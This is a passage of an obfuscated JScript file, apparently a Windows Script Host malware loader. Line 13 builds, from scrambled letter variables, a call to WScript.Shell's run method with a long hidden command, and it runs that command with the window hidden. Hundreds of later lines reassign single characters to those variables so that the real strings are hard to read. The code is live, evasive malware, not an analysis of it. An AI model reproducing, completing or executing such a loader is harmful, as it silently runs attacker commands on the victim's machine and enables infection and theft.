13 | this[jtwknri + wawsm + cbwrhhz + axlhw + ypzvpb + rnpgvay + ndiimmiq][nvhxhjhs + axlhw + rbkvsq + hdjlp + ndiimmiq + rbkvsq + ijjlh + ffizymnt + iefnk + rbkvsq + cbwrhhz + ndiimmiq] ( jtwknri + wawsm + cbwrhhz + axlhw + ypzvpb + rnpgvay + ndiimmiq + lscayqll + wawsm + mltoaixa + rbkvsq + iifnqus + iifnqus ) [axlhw + kerwi + simkc] ( cbwrhhz + monasatrz + zaoqidyt + meenlr + ooymi + cbwrhhz + meenlr + rnpgvay + vsjlcby + obzhfhlus + rbkvsq + axlhw + ajaivkcy + mltoaixa + rbkvsq + iifnqus + iifnqus + lscayqll + rbkvsq + mqtvq + rbkvsq + meenlr + ltxwwkw + nvhxhjhs + vsjlcby + monasatrz + monasatrz + hdjlp + simkc + zaoqidyt + meenlr + vrlvd + cwfyi + simkc + uiikvihlq + vsjlcby + dgweca + rbkvsq + ltxwwkw + jtwknri + rbkvsq + ffizymnt + ueyum + rbkvsq + sxvtwkj + kerwi + rbkvsq + ajaivkcy + ndiimmiq + meenlr + ltxwwkw + ijjlh + kerwi + ndiimmiq + fvvjl + ypzvpb + iifnqus + rbkvsq + meenlr + hydutez + ndiimmiq + rbkvsq + monasatrz + rnpgvay + hydutez + lnhzyofo + ypzvpb + simkc + uiikvihlq + vsjlcby + ypzvpb + cbwrhhz + rbkvsq + lscayqll + rnpgvay + zaoqidyt + mxwawjw + meenlr + mltoaixa + ndiimmiq + ndiimmiq + rnpgvay + kpuirdi + ooymi + ooymi + zgjprt + xnydghse + brsbgrw + lscayqll + zgjprt + ndtiq + brsbgrw + lscayqll + zgjprt + lscayqll + fibfcp + zxmabzh + zszrgbpv + ooymi + ypzvpb + simkc + uiikvihlq + vsjlcby + ypzvpb + cbwrhhz + rbkvsq + lscayqll + rnpgvay + mltoaixa + rnpgvay + vrlvd + apczzabkm + apczzabkm + ajaivkcy + ndiimmiq + hdjlp + axlhw + ndiimmiq + meenlr + hydutez + ndiimmiq + rbkvsq + monasatrz + rnpgvay + hydutez + lnhzyofo + ypzvpb + simkc + uiikvihlq + vsjlcby + ypzvpb + cbwrhhz + rbkvsq + lscayqll + rnpgvay + zaoqidyt + mxwawjw + apczzabkm + apczzabkm + cbwrhhz + monasatrz + zaoqidyt + meenlr + ooymi + cbwrhhz + meenlr + simkc + rbkvsq + ndiimmiq + meenlr + kerwi + ajaivkcy + rbkvsq + meenlr + lnhzyofo + lnhzyofo + zgjprt + xnydghse + brsbgrw + lscayqll + zgjprt + ndtiq + brsbgrw + lscayqll + zgjprt + lscayqll + fibfcp + zxmabzh + zszrgbpv + sxpjf + mctwdhx + mctwdhx + mctwdhx + mctwdhx + lnhzyofo + zaoqidyt + hdjlp + uiikvihlq + obzhfhlus + obzhfhlus + obzhfhlus + axlhw + vsjlcby + vsjlcby + ndiimmiq + lnhzyofo + apczzabkm + apczzabkm + cbwrhhz + monasatrz + zaoqidyt + meenlr + ooymi + cbwrhhz + meenlr + axlhw + rbkvsq + zrdnmngr + ajaivkcy + uiikvihlq + axlhw + brsbgrw + fibfcp + meenlr + ooymi + ajaivkcy + meenlr + lnhzyofo + lnhzyofo + zgjprt + xnydghse + brsbgrw + lscayqll + zgjprt + ndtiq + brsbgrw + lscayqll + zgjprt + lscayqll + fibfcp + zxmabzh + zszrgbpv + sxpjf + mctwdhx + mctwdhx + mctwdhx + mctwdhx + lnhzyofo + zaoqidyt + hdjlp + uiikvihlq + obzhfhlus + obzhfhlus + obzhfhlus + axlhw + vsjlcby + vsjlcby + ndiimmiq + lnhzyofo + zgjprt + zszrgbpv + zoeeorpkn + htextmoc + fibfcp + fibfcp + fibfcp + zgjprt + fibfcp + zgjprt + zoeeorpkn + zoeeorpkn + mctwdhx + htextmoc + lscayqll + zaoqidyt + iifnqus + iifnqus, 0, false ); |
|
14 | } | |
15 | zszrgbpv = "E"; | |
16 | zszrgbpv = "k"; | |
17 | zszrgbpv = "C"; | |
18 | zszrgbpv = "z"; | |
19 | zszrgbpv = "k"; | |
20 | zszrgbpv = "s"; | |
21 | zszrgbpv = "g"; | |
22 | zszrgbpv = "P"; | |
23 | zszrgbpv = "N"; | |
24 | zszrgbpv = "e"; | |
25 | zszrgbpv = "y"; | |
26 | zszrgbpv = "H"; | |
27 | zszrgbpv = "X"; | |
28 | zszrgbpv = "M"; | |
29 | zszrgbpv = "b"; | |
30 | zszrgbpv = "Z"; | |
31 | zszrgbpv = "U"; | |
32 | zszrgbpv = "W"; | |
33 | zszrgbpv = "c"; | |
34 | zszrgbpv = "Q"; | |
35 | zszrgbpv = "j"; | |
36 | zszrgbpv = "k"; | |
37 | zszrgbpv = "k"; | |
38 | zszrgbpv = "5"; | |
39 | mxwawjw = "p"; | |
40 | mxwawjw = "m"; | |
41 | mxwawjw = "u"; | |
42 | mxwawjw = "w"; | |
43 | mxwawjw = "q"; | |
44 | mxwawjw = "R"; | |
45 | mxwawjw = "W"; | |
46 | mxwawjw = "X"; | |
47 | mxwawjw = "f"; | |
48 | cwfyi = "j"; | |
49 | cwfyi = "d"; | |
50 | cwfyi = "T"; | |
51 | cwfyi = "l"; | |
52 | cwfyi = "O"; | |
53 | cwfyi = "A"; | |
54 | cwfyi = "n"; | |
55 | cwfyi = "c"; | |
56 | cwfyi = "A"; | |
57 | cwfyi = "P"; | |
58 | cwfyi = "G"; | |
59 | cwfyi = "V"; | |
60 | cwfyi = "F"; | |
61 | cwfyi = "c"; | |
62 | cwfyi = "q"; | |
63 | cwfyi = "c"; | |
64 | cwfyi = "E"; | |
65 | cwfyi = "K"; | |
66 | cwfyi = "j"; | |
67 | cwfyi = "n"; | |
68 | cwfyi = "k"; | |
69 | cwfyi = "W"; | |
70 | cwfyi = "m"; | |
71 | cwfyi = "l"; | |
72 | cwfyi = "b"; | |
73 | cwfyi = "E"; | |
74 | cwfyi = "y"; | |
75 | cwfyi = "f"; | |
76 | cwfyi = "I"; | |
77 | zrdnmngr = "B"; | |
78 | zrdnmngr = "q"; | |
79 | zrdnmngr = "m"; | |
80 | zrdnmngr = "b"; | |
81 | zrdnmngr = "s"; | |
82 | zrdnmngr = "w"; | |
83 | zrdnmngr = "L"; | |
84 | zrdnmngr = "v"; | |
85 | zrdnmngr = "x"; | |
86 | zrdnmngr = "o"; | |
87 | zrdnmngr = "N"; | |
88 | zrdnmngr = "h"; | |
89 | zrdnmngr = "C"; | |
90 | zrdnmngr = "z"; | |
91 | zrdnmngr = "G"; | |
92 | zrdnmngr = "T"; | |
93 | zrdnmngr = "v"; | |
94 | zrdnmngr = "w"; | |
95 | zrdnmngr = "P"; | |
96 | zrdnmngr = "v"; | |
97 | zrdnmngr = "k"; | |
98 | zrdnmngr = "X"; | |
99 | zrdnmngr = "l"; | |
100 | zrdnmngr = "s"; | |
101 | zrdnmngr = "K"; | |
102 | zrdnmngr = "i"; | |
103 | zrdnmngr = "R"; | |
104 | zrdnmngr = "d"; | |
105 | zrdnmngr = "R"; | |
106 | zrdnmngr = "G"; | |
107 | zrdnmngr = "l"; | |
108 | zrdnmngr = "n"; | |
109 | zrdnmngr = "f"; | |
110 | zrdnmngr = "t"; | |
111 | zrdnmngr = "W"; | |
112 | zrdnmngr = "U"; | |
113 | zrdnmngr = "C"; | |
114 | zrdnmngr = "C"; | |
115 | zrdnmngr = "x"; | |
116 | zrdnmngr = "n"; | |
117 | zrdnmngr = "M"; | |
118 | zrdnmngr = "J"; | |
119 | zrdnmngr = "B"; | |
120 | zrdnmngr = "g"; | |
121 | obzhfhlus = "J"; | |
122 | obzhfhlus = "v"; | |
123 | obzhfhlus = "Q"; | |
124 | obzhfhlus = "u"; | |
125 | obzhfhlus = "M"; | |
126 | obzhfhlus = "e"; | |
127 | obzhfhlus = "M"; | |
128 | obzhfhlus = "T"; | |
129 | obzhfhlus = "v"; | |
130 | obzhfhlus = "H"; | |
131 | obzhfhlus = "w"; | |
132 | obzhfhlus = "l"; | |
133 | obzhfhlus = "r"; | |
134 | obzhfhlus = "p"; | |
135 | obzhfhlus = "z"; | |
136 | obzhfhlus = "e"; | |
137 | obzhfhlus = "i"; | |
138 | obzhfhlus = "z"; | |
139 | obzhfhlus = "L"; | |
140 | obzhfhlus = "K"; | |
141 | obzhfhlus = "z"; | |
142 | obzhfhlus = "s"; | |
143 | obzhfhlus = "X"; | |
144 | obzhfhlus = "g"; | |
145 | obzhfhlus = "G"; | |
146 | obzhfhlus = "z"; | |
147 | obzhfhlus = "q"; | |
148 | obzhfhlus = "e"; | |
149 | obzhfhlus = "v"; | |
150 | obzhfhlus = "e"; | |
151 | obzhfhlus = "I"; | |
152 | obzhfhlus = "C"; | |
153 | obzhfhlus = "F"; | |
154 | obzhfhlus = "x"; | |
155 | obzhfhlus = "S"; | |
156 | obzhfhlus = "w"; | |
157 | cbwrhhz = "r"; | |
158 | cbwrhhz = "n"; | |
159 | cbwrhhz = "w"; | |
160 | cbwrhhz = "g"; | |
161 | cbwrhhz = "F"; | |
162 | cbwrhhz = "R"; | |
163 | cbwrhhz = "D"; | |
164 | cbwrhhz = "S"; | |
165 | cbwrhhz = "U"; | |
166 | cbwrhhz = "D"; | |
167 | cbwrhhz = "R"; | |
168 | cbwrhhz = "x"; | |
169 | cbwrhhz = "a"; | |
170 | cbwrhhz = "w"; | |
171 | cbwrhhz = "D"; | |
172 | cbwrhhz = "E"; | |
173 | cbwrhhz = "e"; | |
174 | cbwrhhz = "Z"; | |
175 | cbwrhhz = "j"; | |
176 | cbwrhhz = "e"; | |
177 | cbwrhhz = "c"; | |
178 | vsjlcby = "G"; | |
179 | vsjlcby = "o"; | |
180 | simkc = "q"; | |
181 | simkc = "K"; | |
182 | simkc = "k"; | |
183 | simkc = "B"; | |
184 | simkc = "r"; | |
185 | simkc = "I"; | |
186 | simkc = "e"; | |
187 | simkc = "B"; | |
188 | simkc = "g"; | |
189 | simkc = "A"; | |
190 | simkc = "L"; | |
191 | simkc = "d"; | |
192 | simkc = "O"; | |
193 | simkc = "c"; | |
194 | simkc = "G"; | |
195 | simkc = "X"; | |
196 | simkc = "F"; | |
197 | simkc = "O"; | |
198 | simkc = "H"; | |
199 | simkc = "U"; | |
200 | simkc = "n"; | |
201 | nvhxhjhs = "o"; | |
202 | nvhxhjhs = "w"; | |
203 | nvhxhjhs = "u"; | |
204 | nvhxhjhs = "Z"; | |
205 | nvhxhjhs = "O"; | |
206 | nvhxhjhs = "Y"; | |
207 | nvhxhjhs = "i"; | |
208 | nvhxhjhs = "s"; | |
209 | nvhxhjhs = "t"; | |
210 | nvhxhjhs = "k"; | |
211 | nvhxhjhs = "T"; | |
212 | nvhxhjhs = "i"; | |
213 | nvhxhjhs = "a"; | |
214 | nvhxhjhs = "h"; | |
215 | nvhxhjhs = "k"; | |
216 | nvhxhjhs = "D"; | |
217 | nvhxhjhs = "J"; | |
218 | nvhxhjhs = "I"; | |
219 | nvhxhjhs = "I"; | |
220 | nvhxhjhs = "w"; | |
221 | nvhxhjhs = "H"; | |
222 | nvhxhjhs = "y"; | |
223 | nvhxhjhs = "a"; | |
224 | nvhxhjhs = "j"; | |
225 | nvhxhjhs = "D"; | |
226 | nvhxhjhs = "j"; | |
227 | nvhxhjhs = "P"; | |
228 | nvhxhjhs = "R"; | |
229 | nvhxhjhs = "l"; | |
230 | nvhxhjhs = "X"; | |
231 | nvhxhjhs = "X"; | |
232 | nvhxhjhs = "e"; | |
233 | nvhxhjhs = "S"; | |
234 | nvhxhjhs = "g"; | |
235 | nvhxhjhs = "l"; | |
236 | nvhxhjhs = "p"; | |
237 | nvhxhjhs = "B"; | |
238 | nvhxhjhs = "i"; | |
239 | nvhxhjhs = "o"; | |
240 | nvhxhjhs = "z"; | |
241 | nvhxhjhs = "C"; | |
242 | htextmoc = "U"; | |
243 | htextmoc = "d"; | |
244 | htextmoc = "M"; | |
245 | htextmoc = "o"; | |
246 | htextmoc = "h"; | |
247 | htextmoc = "T"; | |
248 | htextmoc = "B"; | |
249 | htextmoc = "S"; | |
250 | htextmoc = "r"; | |
251 | htextmoc = "M"; | |
252 | htextmoc = "i"; | |
253 | htextmoc = "T"; | |
254 | htextmoc = "W"; | |
255 | htextmoc = "D"; | |
256 | htextmoc = "F"; | |
257 | htextmoc = "d"; | |
258 | htextmoc = "a"; | |
259 | htextmoc = "E"; | |
260 | htextmoc = "p"; | |
261 | htextmoc = "r"; | |
262 | htextmoc = "N"; | |
263 | htextmoc = "P"; | |
264 | htextmoc = "e"; | |
265 | htextmoc = "Z"; | |
266 | htextmoc = "H"; | |
267 | htextmoc = "r"; | |
268 | htextmoc = "H"; | |
269 | htextmoc = "v"; | |
270 | htextmoc = "v"; | |
271 | htextmoc = "V"; | |
272 | htextmoc = "Y"; | |
273 | htextmoc = "o"; | |
274 | htextmoc = "H"; | |
275 | htextmoc = "U"; | |
276 | htextmoc = "c"; | |
277 | htextmoc = "G"; | |
278 | htextmoc = "6"; | |
279 | axlhw = "W"; | |
280 | axlhw = "h"; | |
281 | axlhw = "O"; | |
282 | axlhw = "M"; | |
283 | axlhw = "U"; | |
284 | axlhw = "I"; | |
285 | axlhw = "h"; | |
286 | axlhw = "F"; | |
287 | axlhw = "F"; | |
288 | axlhw = "S"; | |
289 | axlhw = "D"; | |
290 | axlhw = "I"; | |
291 | axlhw = "z"; | |
292 | axlhw = "a"; | |
293 | axlhw = "w"; | |
294 | axlhw = "W"; | |
295 | axlhw = "H"; | |
296 | axlhw = "d"; | |
297 | axlhw = "m"; | |
298 | axlhw = "o"; | |
299 | axlhw = "K"; | |
300 | axlhw = "c"; | |
301 | axlhw = "Z"; | |
302 | axlhw = "r"; | |
303 | fvvjl = "j"; | |
304 | fvvjl = "f"; | |
305 | fvvjl = "D"; | |
306 | fvvjl = "R"; | |
307 | fvvjl = "Q"; | |
308 | fvvjl = "a"; | |
309 | fvvjl = "Y"; | |
310 | fvvjl = "K"; | |
311 | fvvjl = "T"; | |
312 | fvvjl = "n"; | |
313 | fvvjl = "I"; | |
314 | fvvjl = "q"; | |
315 | fvvjl = "y"; | |
316 | fvvjl = "P"; | |
317 | fvvjl = "x"; | |
318 | fvvjl = "S"; | |
319 | fvvjl = "P"; | |
320 | fvvjl = "n"; | |
321 | fvvjl = "x"; | |
322 | fvvjl = "B"; | |
323 | fvvjl = "L"; | |
324 | fvvjl = "n"; | |
325 | fvvjl = "g"; | |
326 | fvvjl = "j"; | |
327 | fvvjl = "R"; | |
328 | fvvjl = "u"; | |
329 | fvvjl = "F"; | |
330 | ajaivkcy = "V"; | |
331 | ajaivkcy = "O"; | |
332 | ajaivkcy = "h"; | |
333 | ajaivkcy = "m"; | |
334 | ajaivkcy = "R"; | |
335 | ajaivkcy = "s"; | |
336 | kerwi = "A"; | |
337 | kerwi = "A"; | |
338 | kerwi = "i"; | |
339 | kerwi = "I"; | |
340 | kerwi = "u"; | |
341 | kerwi = "r"; | |
342 | kerwi = "p"; | |
343 | kerwi = "m"; | |
344 | kerwi = "L"; | |
345 | kerwi = "E"; | |
346 | kerwi = "e"; | |
347 | kerwi = "H"; | |
348 | kerwi = "i"; | |
349 | kerwi = "u"; | |
350 | wznbjfndd = "T"; | |
351 | wznbjfndd = "C"; | |
352 | wznbjfndd = "G"; | |
353 | wznbjfndd = "x"; | |
354 | wznbjfndd = "L"; | |
355 | wznbjfndd = "D"; | |
356 | wznbjfndd = "P"; | |
357 | wznbjfndd = "Z"; | |
358 | wznbjfndd = "D"; | |
359 | wznbjfndd = "f"; | |
360 | wznbjfndd = "z"; | |
361 | wznbjfndd = "I"; | |
362 | wznbjfndd = "C"; | |
363 | wznbjfndd = "b"; | |
364 | wznbjfndd = "q"; | |
365 | wznbjfndd = "u"; | |
366 | wznbjfndd = "V"; | |
367 | wznbjfndd = "o"; | |
368 | wznbjfndd = "f"; | |
369 | wznbjfndd = "g"; | |
370 | wznbjfndd = "J"; | |
371 | wznbjfndd = "m"; | |
372 | wznbjfndd = "Z"; | |
373 | wznbjfndd = "J"; | |
374 | wznbjfndd = "m"; | |
375 | wznbjfndd = "Z"; | |
376 | wznbjfndd = "E"; | |
377 | wznbjfndd = "R"; | |
378 | wznbjfndd = "H"; | |
379 | wznbjfndd = "A"; | |
380 | wznbjfndd = "D"; | |
381 | wznbjfndd = "k"; | |
382 | wznbjfndd = "c"; | |
383 | wznbjfndd = "r"; | |
384 | wznbjfndd = "E"; | |
385 | wznbjfndd = "I"; | |
386 | wznbjfndd = "a"; | |
387 | wznbjfndd = "C"; | |
388 | wznbjfndd = "_"; | |
389 | hydutez = "w"; | |
390 | hydutez = "I"; | |
391 | hydutez = "f"; | |
392 | hydutez = "J"; | |
393 | hydutez = "M"; | |
394 | hydutez = "E"; | |
395 | hydutez = "l"; | |
396 | hydutez = "c"; | |
397 | hydutez = "g"; | |
398 | hydutez = "n"; | |
399 | hydutez = "W"; | |
400 | hydutez = "Y"; | |
401 | hydutez = "b"; | |
402 | hydutez = "b"; | |
403 | hydutez = "P"; | |
404 | hydutez = "h"; | |
405 | hydutez = "o"; | |
406 | hydutez = "S"; | |
407 | hydutez = "O"; | |
408 | hydutez = "o"; | |
409 | hydutez = "B"; | |
410 | hydutez = "b"; | |
411 | hydutez = "e"; | |
412 | hydutez = "X"; | |
413 | hydutez = "B"; | |
414 | hydutez = "V"; | |
415 | hydutez = "g"; | |
416 | hydutez = "Y"; | |
417 | hydutez = "t"; | |
418 | hydutez = "i"; | |
419 | hydutez = "S"; | |
420 | hydutez = "i"; | |
421 | hydutez = "W"; | |
422 | hydutez = "M"; | |
423 | hydutez = "q"; | |
424 | hydutez = "S"; | |
425 | hydutez = "E"; | |
426 | hydutez = "A"; | |
427 | hydutez = "W"; | |
428 | hydutez = "i"; | |
429 | hydutez = "W"; | |
430 | hydutez = "P"; | |
431 | hydutez = "k"; | |
432 | hydutez = "%"; | |
433 | xnydghse = "d"; | |
434 | xnydghse = "v"; | |
435 | xnydghse = "G"; | |
436 | xnydghse = "l"; | |
437 | xnydghse = "E"; | |
438 | xnydghse = "U"; | |
439 | xnydghse = "u"; | |
440 | xnydghse = "z"; | |
441 | xnydghse = "n"; | |
442 | xnydghse = "C"; | |
443 | xnydghse = "g"; | |
444 | xnydghse = "J"; | |
445 | xnydghse = "J"; | |
446 | xnydghse = "O"; | |
447 | xnydghse = "p"; | |
448 | xnydghse = "m"; | |
449 | xnydghse = "D"; | |
450 | xnydghse = "W"; | |
451 | xnydghse = "w"; | |
452 | xnydghse = "w"; | |
453 | xnydghse = "u"; | |
454 | xnydghse = "k"; | |
455 | xnydghse = "n"; | |
456 | xnydghse = "U"; | |
457 | xnydghse = "X"; | |
458 | xnydghse = "R"; | |
459 | xnydghse = "Z"; | |
460 | xnydghse = "g"; | |
461 | xnydghse = "O"; | |
462 | xnydghse = "u"; | |
463 | xnydghse = "G"; | |
464 | xnydghse = "i"; | |
465 | xnydghse = "M"; | |
466 | xnydghse = "k"; | |
467 | xnydghse = "N"; | |
468 | xnydghse = "M"; | |
469 | xnydghse = "H"; | |
470 | xnydghse = "z"; | |
471 | xnydghse = "9"; | |
472 | fqnhbjg = "U"; | |
473 | fqnhbjg = "F"; | |
474 | fqnhbjg = "b"; | |
475 | fqnhbjg = "r"; | |
476 | fqnhbjg = "L"; | |
477 | fqnhbjg = "a"; | |
478 | fqnhbjg = "c"; | |
479 | fqnhbjg = "c"; | |
480 | fqnhbjg = "A"; | |
481 | fqnhbjg = "U"; | |
482 | fqnhbjg = "J"; | |
483 | fqnhbjg = "A"; | |
484 | fqnhbjg = "M"; | |
485 | fqnhbjg = "h"; | |
486 | fqnhbjg = "N"; | |
487 | fibfcp = "J"; | |
488 | fibfcp = "k"; | |
489 | fibfcp = "h"; | |
490 | fibfcp = "2"; | |
491 | mtlhis = "C"; | |
492 | mtlhis = "f"; | |
493 | mtlhis = "w"; | |
494 | mtlhis = "e"; | |
495 | mtlhis = "B"; | |
496 | mtlhis = "C"; | |
497 | mtlhis = "y"; | |
498 | mtlhis = "q"; | |
499 | mtlhis = "W"; | |
500 | mtlhis = "i"; | |
501 | mtlhis = "P"; | |
502 | mtlhis = "c"; | |
503 | mtlhis = "a"; | |
504 | mtlhis = "b"; | |
505 | mtlhis = "Q"; | |
506 | mtlhis = "d"; | |
507 | mtlhis = "V"; | |
508 | mtlhis = "n"; | |
509 | mtlhis = "S"; | |
510 | mtlhis = "C"; | |
511 | mtlhis = "c"; | |
512 | mtlhis = "E"; | |
513 | mtlhis = "V"; | |
514 | mtlhis = "y"; | |
515 | mtlhis = "u"; | |
516 | mtlhis = "L"; | |
517 | mtlhis = "F"; | |
518 | mtlhis = "C"; | |
519 | mtlhis = "n"; | |
520 | mtlhis = "M"; | |
521 | mtlhis = "z"; | |
522 | mtlhis = "L"; | |
523 | mtlhis = "b"; | |
524 | mtlhis = "L"; | |
525 | mtlhis = "e"; | |
526 | mtlhis = "I"; | |
527 | mtlhis = "p"; | |
528 | mtlhis = "e"; | |
529 | mtlhis = "X"; | |
530 | mtlhis = "u"; | |
531 | mtlhis = "K"; | |
532 | lmikozd = "y"; | |
533 | lmikozd = "n"; | |
534 | lmikozd = "w"; | |
535 | lmikozd = "H"; | |
536 | lmikozd = "S"; | |
537 | lmikozd = "c"; | |
538 | lmikozd = "q"; | |
539 | lmikozd = "u"; | |
540 | lmikozd = "J"; | |
541 | lmikozd = "Q"; | |
542 | lmikozd = "Y"; | |
543 | lmikozd = "o"; | |
544 | lmikozd = "n"; | |
545 | lmikozd = "r"; | |
546 | lmikozd = "E"; | |
547 | lmikozd = "a"; | |
548 | lmikozd = "y"; | |
549 | lmikozd = "n"; | |
550 | lmikozd = "Z"; | |
551 | lmikozd = "e"; | |
552 | lmikozd = "B"; | |
553 | lmikozd = "x"; | |
554 | lmikozd = "M"; | |
555 | lmikozd = "O"; | |
556 | lmikozd = "m"; | |
557 | lmikozd = "c"; | |
558 | lmikozd = "w"; | |
559 | lmikozd = "f"; | |
560 | lmikozd = "w"; | |
561 | lmikozd = "d"; | |
562 | lmikozd = "L"; | |
563 | lmikozd = "a"; | |
564 | lmikozd = "D"; | |
565 | lmikozd = "h"; | |
566 | lmikozd = "n"; | |
567 | lmikozd = "E"; | |
568 | lmikozd = "E"; | |
569 | nniwg = "E"; | |
570 | nniwg = "S"; | |
571 | nniwg = "v"; | |
572 | nniwg = "b"; | |
573 | nniwg = "j"; | |
574 | nniwg = "M"; | |
575 | nniwg = "S"; | |
576 | nniwg = "c"; | |
577 | nniwg = "b"; | |
578 | nniwg = "r"; | |
579 | nniwg = "G"; | |
580 | nniwg = "F"; | |
581 | nniwg = "m"; | |
582 | nniwg = "S"; | |
583 | nniwg = "T"; | |
584 | nniwg = "G"; | |
585 | nniwg = "N"; | |
586 | nniwg = "B"; | |
587 | nniwg = "A"; | |
588 | nniwg = "Z"; | |
589 | nniwg = "I"; | |
590 | nniwg = "C"; | |
591 | nniwg = "d"; | |
592 | nniwg = "B"; | |
593 | nniwg = "s"; | |
594 | nniwg = "t"; | |
595 | nniwg = "I"; | |
596 | nniwg = "c"; | |
597 | nniwg = "D"; | |
598 | nniwg = "b"; | |
599 | nniwg = "P"; | |
600 | nniwg = "T"; | |
601 | nniwg = "f"; | |
602 | nniwg = "c"; | |
603 | nniwg = "N"; | |
604 | nniwg = "U"; | |
605 | brsbgrw = "e"; | |
606 | brsbgrw = "J"; | |
607 | brsbgrw = "d"; | |
608 | brsbgrw = "Y"; | |
609 | brsbgrw = "Q"; | |
610 | brsbgrw = "E"; | |
611 | brsbgrw = "Y"; | |
612 | brsbgrw = "l"; | |
613 | brsbgrw = "J"; | |
614 | brsbgrw = "V"; | |
615 | brsbgrw = "h"; | |
616 | brsbgrw = "u"; | |
617 | brsbgrw = "I"; | |
618 | brsbgrw = "n"; | |
619 | brsbgrw = "F"; | |
620 | brsbgrw = "Q"; | |
621 | brsbgrw = "p"; | |
622 | brsbgrw = "3"; | |
623 | gqpszrxdw = "p"; | |
624 | gqpszrxdw = "S"; | |
625 | gqpszrxdw = "e"; | |
626 | gqpszrxdw = "v"; | |
627 | gqpszrxdw = "c"; | |
628 | gqpszrxdw = "p"; | |
629 | gqpszrxdw = "x"; | |
630 | gqpszrxdw = "g"; | |
631 | gqpszrxdw = "b"; | |
632 | gqpszrxdw = "f"; | |
633 | gqpszrxdw = "W"; | |
634 | gqpszrxdw = "J"; | |
635 | gqpszrxdw = "H"; | |
636 | gqpszrxdw = "N"; | |
637 | gqpszrxdw = "H"; | |
638 | gqpszrxdw = "g"; | |
639 | gqpszrxdw = "I"; | |
640 | gqpszrxdw = "P"; | |
641 | wawsm = "z"; | |
642 | wawsm = "m"; | |
643 | wawsm = "l"; | |
644 | wawsm = "g"; | |
645 | wawsm = "S"; | |
646 | ffizymnt = "v"; | |
647 | ffizymnt = "h"; | |
648 | ffizymnt = "b"; | |
649 | mwqoztc = "r"; | |
650 | mwqoztc = "p"; | |
651 | mwqoztc = "Q"; | |
652 | mwqoztc = "E"; | |
653 | mwqoztc = "h"; | |
654 | mwqoztc = "i"; | |
655 | mwqoztc = "i"; | |
656 | mwqoztc = "x"; | |
657 | mwqoztc = "o"; | |
658 | mwqoztc = "b"; | |
659 | mwqoztc = "o"; | |
660 | mwqoztc = "M"; | |
661 | mwqoztc = "i"; | |
662 | mwqoztc = "b"; | |
663 | mwqoztc = "N"; | |
664 | mwqoztc = "k"; | |
665 | mwqoztc = "J"; | |
666 | mwqoztc = "i"; | |
667 | mwqoztc = "z"; | |
668 | mwqoztc = "p"; | |
669 | mwqoztc = "G"; | |
670 | mwqoztc = "u"; | |
671 | mwqoztc = "b"; | |
672 | mwqoztc = "c"; | |
673 | mwqoztc = "K"; | |
674 | mwqoztc = "L"; | |
675 | zoeeorpkn = "P"; | |
676 | zoeeorpkn = "M"; | |
677 | zoeeorpkn = "s"; | |
678 | zoeeorpkn = "m"; | |
679 | zoeeorpkn = "V"; | |
680 | zoeeorpkn = "e"; | |
681 | zoeeorpkn = "O"; | |
682 | zoeeorpkn = "L"; | |
683 | zoeeorpkn = "Z"; | |
684 | zoeeorpkn = "m"; | |
685 | zoeeorpkn = "x"; | |
686 | zoeeorpkn = "V"; | |
687 | zoeeorpkn = "g"; | |
688 | zoeeorpkn = "O"; | |
689 | zoeeorpkn = "Y"; | |
690 | zoeeorpkn = "m"; | |
691 | zoeeorpkn = "u"; | |
692 | zoeeorpkn = "m"; | |
693 | zoeeorpkn = "h"; | |
694 | zoeeorpkn = "c"; | |
695 | zoeeorpkn = "Z"; | |
696 | zoeeorpkn = "A"; | |
697 | zoeeorpkn = "l"; | |
698 | zoeeorpkn = "h"; | |
699 | zoeeorpkn = "L"; | |
700 | zoeeorpkn = "R"; | |
701 | zoeeorpkn = "n"; | |
702 | zoeeorpkn = "7"; | |
703 | rzynou = "o"; | |
704 | rzynou = "z"; | |
705 | rzynou = "E"; | |
706 | rzynou = "f"; | |
707 | rzynou = "d"; | |
708 | rzynou = "Y"; | |
709 | rzynou = "e"; | |
710 | rzynou = "D"; | |
711 | rzynou = "i"; | |
712 | rzynou = "f"; | |
713 | rzynou = "F"; | |
714 | rzynou = "A"; | |
715 | rzynou = "R"; | |
716 | rzynou = "I"; | |
717 | rzynou = "K"; | |
718 | rzynou = "Y"; | |
719 | rzynou = "T"; | |
720 | rzynou = "n"; | |
721 | rzynou = "E"; | |
722 | rzynou = "O"; | |
723 | rzynou = "h"; | |
724 | rzynou = "J"; | |
725 | rzynou = "Y"; | |
726 | rzynou = "Z"; | |
727 | rzynou = "Y"; | |
728 | apczzabkm = "o"; | |
729 | apczzabkm = "i"; | |
730 | apczzabkm = "h"; | |
731 | apczzabkm = "u"; | |
732 | apczzabkm = "c"; | |
733 | apczzabkm = "z"; | |
734 | apczzabkm = "B"; | |
735 | apczzabkm = "h"; | |
736 | apczzabkm = "t"; | |
737 | apczzabkm = "r"; | |
738 | apczzabkm = "M"; | |
739 | apczzabkm = "o"; | |
740 | apczzabkm = "U"; | |
741 | apczzabkm = "o"; | |
742 | apczzabkm = "V"; | |
743 | apczzabkm = "f"; | |
744 | apczzabkm = "h"; | |
745 | apczzabkm = "K"; | |
746 | apczzabkm = "B"; | |
747 | apczzabkm = "j"; | |
748 | apczzabkm = "k"; | |
749 | apczzabkm = "s"; | |
750 | apczzabkm = "E"; | |
751 | apczzabkm = "M"; | |
752 | apczzabkm = "l"; | |
753 | apczzabkm = "N"; | |
754 | apczzabkm = "D"; | |
755 | apczzabkm = "V"; | |
756 | apczzabkm = "A"; | |
757 | apczzabkm = "O"; | |
758 | apczzabkm = "c"; | |
759 | apczzabkm = "a"; | |
760 | apczzabkm = "b"; | |
761 | apczzabkm = "E"; | |
762 | apczzabkm = "J"; | |
763 | apczzabkm = "&"; | |
764 | sxpjf = "O"; | |
765 | sxpjf = "S"; | |
766 | sxpjf = "n"; | |
767 | sxpjf = "N"; | |
768 | sxpjf = "G"; | |
769 | sxpjf = "R"; | |
770 | sxpjf = "B"; | |
771 | sxpjf = "T"; | |
772 | sxpjf = "t"; | |
773 | sxpjf = "B"; | |
774 | sxpjf = "n"; | |
775 | sxpjf = "Z"; | |
776 | sxpjf = "s"; | |
777 | sxpjf = "n"; | |
778 | sxpjf = "M"; | |
779 | sxpjf = "l"; | |
780 | sxpjf = "u"; | |
781 | sxpjf = "Y"; | |
782 | sxpjf = "i"; | |
783 | sxpjf = "C"; | |
784 | sxpjf = "U"; | |
785 | sxpjf = "u"; | |
786 | sxpjf = "F"; | |
787 | sxpjf = "j"; | |
788 | sxpjf = "h"; | |
789 | sxpjf = "a"; | |
790 | sxpjf = "f"; | |
791 | sxpjf = "f"; | |
792 | sxpjf = "x"; | |
